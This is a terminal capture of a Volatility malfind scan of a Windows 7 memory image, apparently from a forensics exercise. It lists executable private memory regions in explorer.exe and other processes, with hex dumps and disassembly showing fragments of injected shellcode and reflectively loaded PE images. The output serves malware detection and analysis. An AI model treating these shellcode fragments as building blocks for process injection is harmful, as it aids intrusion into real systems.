┌─[root@parrot]─[/home/parrot/Desktop]
└──╼ #volatility -f /home/parrot/Desktop/WIN-L74K1LLT618-20250823-093248.raw --profile=Win7SP1x64 malfind
Volatility Foundation Volatility Framework 2.6
Process: wvs_supervisor Pid: 1088 Address: 0x2e0000 Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE Flags: CommitCharge: 1, MemCommit: 1, PrivateMemory: 1, Protection: 6
0x002e0000 00 00 00 00 59 e9 ce cd 13 00 e8 f5 ff ff ff 00 ....Y........... 0x002e0010 00 00 00 00 00 00 00 e8 e8 ff ff ff 0a 00 2e 00 ................ 0x002e0020 00 00 00 00 e8 db ff ff ff 17 00 2e 00 00 00 00 ................ 0x002e0030 00 e8 ce ff ff ff 24 00 2e 00 00 00 00 00 e8 c1 ......$.........
0x002e0000 0000 ADD [EAX], AL 0x002e0002 0000 ADD [EAX], AL 0x002e0004 59 POP ECX 0x002e0005 e9cecd1300 JMP 0x41cdd8 0x002e000a e8f5ffffff CALL 0x2e0004 0x002e000f 0000 ADD [EAX], AL 0x002e0011 0000 ADD [EAX], AL 0x002e0013 0000 ADD [EAX], AL 0x002e0015 0000 ADD [EAX], AL 0x002e0017 e8e8ffffff CALL 0x2e0004 0x002e001c 0a00 OR AL, [EAX] 0x002e001e 2e0000 ADD [CS:EAX], AL 0x002e0021 0000 ADD [EAX], AL 0x002e0023 00e8 ADD AL, CH 0x002e0025 db DB 0xdb 0x002e0026 ff DB 0xff 0x002e0027 ff DB 0xff 0x002e0028 ff17 CALL DWORD [EDI] 0x002e002a 002e ADD [ESI], CH 0x002e002c 0000 ADD [EAX], AL 0x002e002e 0000 ADD [EAX], AL 0x002e0030 00e8 ADD AL, CH 0x002e0032 ce INTO 0x002e0033 ff DB 0xff 0x002e0034 ff DB 0xff 0x002e0035 ff2400 JMP DWORD [EAX+EAX] 0x002e0038 2e0000 ADD [CS:EAX], AL 0x002e003b 0000 ADD [EAX], AL 0x002e003d 00e8 ADD AL, CH 0x002e003f c1 DB 0xc1
Process: opsrv.exe Pid: 1140 Address: 0x670000 Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE Flags: CommitCharge: 1, MemCommit: 1, PrivateMemory: 1, Protection: 6
0x00670000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0x00670010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0x00670020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0x00670030 00 00 00 00 00 00 00 00 00 00 67 00 00 00 00 00 ..........g.....
0x00670000 0000 ADD [EAX], AL 0x00670002 0000 ADD [EAX], AL 0x00670004 0000 ADD [EAX], AL 0x00670006 0000 ADD [EAX], AL 0x00670008 0000 ADD [EAX], AL 0x0067000a 0000 ADD [EAX], AL 0x0067000c 0000 ADD [EAX], AL 0x0067000e 0000 ADD [EAX], AL 0x00670010 0000 ADD [EAX], AL 0x00670012 0000 ADD [EAX], AL 0x00670014 0000 ADD [EAX], AL 0x00670016 0000 ADD [EAX], AL 0x00670018 0000 ADD [EAX], AL 0x0067001a 0000 ADD [EAX], AL 0x0067001c 0000 ADD [EAX], AL 0x0067001e 0000 ADD [EAX], AL 0x00670020 0000 ADD [EAX], AL 0x00670022 0000 ADD [EAX], AL 0x00670024 0000 ADD [EAX], AL 0x00670026 0000 ADD [EAX], AL 0x00670028 0000 ADD [EAX], AL 0x0067002a 0000 ADD [EAX], AL 0x0067002c 0000 ADD [EAX], AL 0x0067002e 0000 ADD [EAX], AL 0x00670030 0000 ADD [EAX], AL 0x00670032 0000 ADD [EAX], AL 0x00670034 0000 ADD [EAX], AL 0x00670036 0000 ADD [EAX], AL 0x00670038 0000 ADD [EAX], AL 0x0067003a 670000 ADD [BX+SI], AL 0x0067003d 0000 ADD [EAX], AL 0x0067003f 00 DB 0x0
Process: explorer.exe Pid: 2616 Address: 0x25d0000 Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE Flags: CommitCharge: 50, MemCommit: 1, PrivateMemory: 1, Protection: 6
0x025d0000 fc 48 89 ce 48 81 ec 00 20 00 00 48 83 e4 f0 e8 .H..H......H.... 0x025d0010 cc 00 00 00 41 51 41 50 52 48 31 d2 65 48 8b 52 ....AQAPRH1.eH.R 0x025d0020 60 48 8b 52 18 48 8b 52 20 51 56 48 0f b7 4a 4a `H.R.H.R.QVH..JJ 0x025d0030 48 8b 72 50 4d 31 c9 48 31 c0 ac 3c 61 7c 02 2c H.rPM1.H1..<a|.,
0x025d0000 fc CLD 0x025d0001 48 DEC EAX 0x025d0002 89ce MOV ESI, ECX 0x025d0004 48 DEC EAX 0x025d0005 81ec00200000 SUB ESP, 0x2000 0x025d000b 48 DEC EAX 0x025d000c 83e4f0 AND ESP, -0x10 0x025d000f e8cc000000 CALL 0x25d00e0 0x025d0014 41 INC ECX 0x025d0015 51 PUSH ECX 0x025d0016 41 INC ECX 0x025d0017 50 PUSH EAX 0x025d0018 52 PUSH EDX 0x025d0019 48 DEC EAX 0x025d001a 31d2 XOR EDX, EDX 0x025d001c 6548 DEC EAX 0x025d001e 8b5260 MOV EDX, [EDX+0x60] 0x025d0021 48 DEC EAX 0x025d0022 8b5218 MOV EDX, [EDX+0x18] 0x025d0025 48 DEC EAX 0x025d0026 8b5220 MOV EDX, [EDX+0x20] 0x025d0029 51 PUSH ECX 0x025d002a 56 PUSH ESI 0x025d002b 48 DEC EAX 0x025d002c 0fb74a4a MOVZX ECX, WORD [EDX+0x4a] 0x025d0030 48 DEC EAX 0x025d0031 8b7250 MOV ESI, [EDX+0x50] 0x025d0034 4d DEC EBP 0x025d0035 31c9 XOR ECX, ECX 0x025d0037 48 DEC EAX 0x025d0038 31c0 XOR EAX, EAX 0x025d003a ac LODSB 0x025d003b 3c61 CMP AL, 0x61 0x025d003d 7c02 JL 0x25d0041 0x025d003f 2c DB 0x2c
Process: explorer.exe Pid: 2616 Address: 0x2610000 Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE Flags: CommitCharge: 38, MemCommit: 1, PrivateMemory: 1, Protection: 6
0x02610000 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 MZ.............. 0x02610010 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@....... 0x02610020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0x02610030 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 ................
0x02610000 4d DEC EBP 0x02610001 5a POP EDX 0x02610002 90 NOP 0x02610003 0003 ADD [EBX], AL 0x02610005 0000 ADD [EAX], AL 0x02610007 000400 ADD [EAX+EAX], AL 0x0261000a 0000 ADD [EAX], AL 0x0261000c ff DB 0xff 0x0261000d ff00 INC DWORD [EAX] 0x0261000f 00b800000000 ADD [EAX+0x0], BH 0x02610015 0000 ADD [EAX], AL 0x02610017 004000 ADD [EAX+0x0], AL 0x0261001a 0000 ADD [EAX], AL 0x0261001c 0000 ADD [EAX], AL 0x0261001e 0000 ADD [EAX], AL 0x02610020 0000 ADD [EAX], AL 0x02610022 0000 ADD [EAX], AL 0x02610024 0000 ADD [EAX], AL 0x02610026 0000 ADD [EAX], AL 0x02610028 0000 ADD [EAX], AL 0x0261002a 0000 ADD [EAX], AL 0x0261002c 0000 ADD [EAX], AL 0x0261002e 0000 ADD [EAX], AL 0x02610030 0000 ADD [EAX], AL 0x02610032 0000 ADD [EAX], AL 0x02610034 0000 ADD [EAX], AL 0x02610036 0000 ADD [EAX], AL 0x02610038 0000 ADD [EAX], AL 0x0261003a 0000 ADD [EAX], AL 0x0261003c f00000 LOCK ADD [EAX], AL 0x0261003f 00 DB 0x0
Process: explorer.exe Pid: 2616 Address: 0x2920000 Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE Flags: CommitCharge: 57, MemCommit: 1, PrivateMemory: 1, Protection: 6
0x02920000 4d 5a 41 52 55 48 89 e5 48 83 ec 20 48 83 e4 f0 MZARUH..H...H... 0x02920010 e8 00 00 00 00 5b 48 81 c3 23 5b 00 00 ff d3 48 .....[H..#[....H 0x02920020 81 c3 c8 ae 02 00 48 89 3b 49 89 d8 6a 04 5a ff ......H.;I..j.Z. 0x02920030 d0 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 ................
0x02920000 4d DEC EBP 0x02920001 5a POP EDX 0x02920002 41 INC ECX 0x02920003 52 PUSH EDX 0x02920004 55 PUSH EBP 0x02920005 48 DEC EAX 0x02920006 89e5 MOV EBP, ESP 0x02920008 48 DEC EAX 0x02920009 83ec20 SUB ESP, 0x20 0x0292000c 48 DEC EAX 0x0292000d 83e4f0 AND ESP, -0x10 0x02920010 e800000000 CALL 0x2920015 0x02920015 5b POP EBX 0x02920016 48 DEC EAX 0x02920017 81c3235b0000 ADD EBX, 0x5b23 0x0292001d ffd3 CALL EBX 0x0292001f 48 DEC EAX 0x02920020 81c3c8ae0200 ADD EBX, 0x2aec8 0x02920026 48 DEC EAX 0x02920027 893b MOV [EBX], EDI 0x02920029 49 DEC ECX 0x0292002a 89d8 MOV EAX, EBX 0x0292002c 6a04 PUSH 0x4 0x0292002e 5a POP EDX 0x0292002f ffd0 CALL EAX 0x02920031 0000 ADD [EAX], AL 0x02920033 0000 ADD [EAX], AL 0x02920035 0000 ADD [EAX], AL 0x02920037 0000 ADD [EAX], AL 0x02920039 0000 ADD [EAX], AL 0x0292003b 00f0 ADD AL, DH 0x0292003d 0000 ADD [EAX], AL 0x0292003f 00 DB 0x0
Process: explorer.exe Pid: 2616 Address: 0x3e10000 Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE Flags: CommitCharge: 1, MemCommit: 1, PrivateMemory: 1, Protection: 6
0x03e10000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0x03e10010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0x03e10020 00 00 e1 03 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0x03e10030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x03e10000 0000 ADD [EAX], AL 0x03e10002 0000 ADD [EAX], AL 0x03e10004 0000 ADD [EAX], AL 0x03e10006 0000 ADD [EAX], AL 0x03e10008 0000 ADD [EAX], AL 0x03e1000a 0000 ADD [EAX], AL 0x03e1000c 0000 ADD [EAX], AL 0x03e1000e 0000 ADD [EAX], AL 0x03e10010 0000 ADD [EAX], AL 0x03e10012 0000 ADD [EAX], AL 0x03e10014 0000 ADD [EAX], AL 0x03e10016 0000 ADD [EAX], AL 0x03e10018 0000 ADD [EAX], AL 0x03e1001a 0000 ADD [EAX], AL 0x03e1001c 0000 ADD [EAX], AL 0x03e1001e 0000 ADD [EAX], AL 0x03e10020 0000 ADD [EAX], AL 0x03e10022 e103 LOOPZ 0x3e10027 0x03e10024 0000 ADD [EAX], AL 0x03e10026 0000 ADD [EAX], AL 0x03e10028 0000 ADD [EAX], AL 0x03e1002a 0000 ADD [EAX], AL 0x03e1002c 0000 ADD [EAX], AL 0x03e1002e 0000 ADD [EAX], AL 0x03e10030 0000 ADD [EAX], AL 0x03e10032 0000 ADD [EAX], AL 0x03e10034 0000 ADD [EAX], AL 0x03e10036 0000 ADD [EAX], AL 0x03e10038 0000 ADD [EAX], AL 0x03e1003a 0000 ADD [EAX], AL 0x03e1003c 0000 ADD [EAX], AL 0x03e1003e 0000 ADD [EAX], AL
Process: explorer.exe Pid: 2616 Address: 0x3e90000 Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE Flags: CommitCharge: 16, MemCommit: 1, PrivateMemory: 1, Protection: 6
0x03e90000 41 ba 80 00 00 00 48 b8 38 a1 d6 fd fe 07 00 00 A.....H.8....... 0x03e90010 48 ff 20 90 41 ba 81 00 00 00 48 b8 38 a1 d6 fd H...A.....H.8... 0x03e90020 fe 07 00 00 48 ff 20 90 41 ba 82 00 00 00 48 b8 ....H...A.....H. 0x03e90030 38 a1 d6 fd fe 07 00 00 48 ff 20 90 41 ba 83 00 8.......H...A...
0x03e90000 41 INC ECX 0x03e90001 ba80000000 MOV EDX, 0x80 0x03e90006 48 DEC EAX 0x03e90007 b838a1d6fd MOV EAX, 0xfdd6a138 0x03e9000c fe07 INC BYTE [EDI] 0x03e9000e 0000 ADD [EAX], AL 0x03e90010 48 DEC EAX 0x03e90011 ff20 JMP DWORD [EAX] 0x03e90013 90 NOP 0x03e90014 41 INC ECX 0x03e90015 ba81000000 MOV EDX, 0x81 0x03e9001a 48 DEC EAX 0x03e9001b b838a1d6fd MOV EAX, 0xfdd6a138 0x03e90020 fe07 INC BYTE [EDI] 0x03e90022 0000 ADD [EAX], AL 0x03e90024 48 DEC EAX 0x03e90025 ff20 JMP DWORD [EAX] 0x03e90027 90 NOP 0x03e90028 41 INC ECX 0x03e90029 ba82000000 MOV EDX, 0x82 0x03e9002e 48 DEC EAX 0x03e9002f b838a1d6fd MOV EAX, 0xfdd6a138 0x03e90034 fe07 INC BYTE [EDI] 0x03e90036 0000 ADD [EAX], AL 0x03e90038 48 DEC EAX 0x03e90039 ff20 JMP DWORD [EAX] 0x03e9003b 90 NOP 0x03e9003c 41 INC ECX 0x03e9003d ba DB 0xba 0x03e9003e 83 DB 0x83 0x03e9003f 00 DB 0x0
Process: explorer.exe Pid: 2616 Address: 0x4360000 Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE Flags: CommitCharge: 106, MemCommit: 1, PrivateMemory: 1, Protection: 6
0x04360000 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 MZ.............. 0x04360010 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@....... 0x04360020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0x04360030 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ................
0x04360000 4d DEC EBP 0x04360001 5a POP EDX 0x04360002 90 NOP 0x04360003 0003 ADD [EBX], AL 0x04360005 0000 ADD [EAX], AL 0x04360007 000400 ADD [EAX+EAX], AL 0x0436000a 0000 ADD [EAX], AL 0x0436000c ff DB 0xff 0x0436000d ff00 INC DWORD [EAX] 0x0436000f 00b800000000 ADD [EAX+0x0], BH 0x04360015 0000 ADD [EAX], AL 0x04360017 004000 ADD [EAX+0x0], AL 0x0436001a 0000 ADD [EAX], AL 0x0436001c 0000 ADD [EAX], AL 0x0436001e 0000 ADD [EAX], AL 0x04360020 0000 ADD [EAX], AL 0x04360022 0000 ADD [EAX], AL 0x04360024 0000 ADD [EAX], AL 0x04360026 0000 ADD [EAX], AL 0x04360028 0000 ADD [EAX], AL 0x0436002a 0000 ADD [EAX], AL 0x0436002c 0000 ADD [EAX], AL 0x0436002e 0000 ADD [EAX], AL 0x04360030 0000 ADD [EAX], AL 0x04360032 0000 ADD [EAX], AL 0x04360034 0000 ADD [EAX], AL 0x04360036 0000 ADD [EAX], AL 0x04360038 0000 ADD [EAX], AL 0x0436003a 0000 ADD [EAX], AL 0x0436003c 0001 ADD [ECX], AL 0x0436003e 0000 ADD [EAX], AL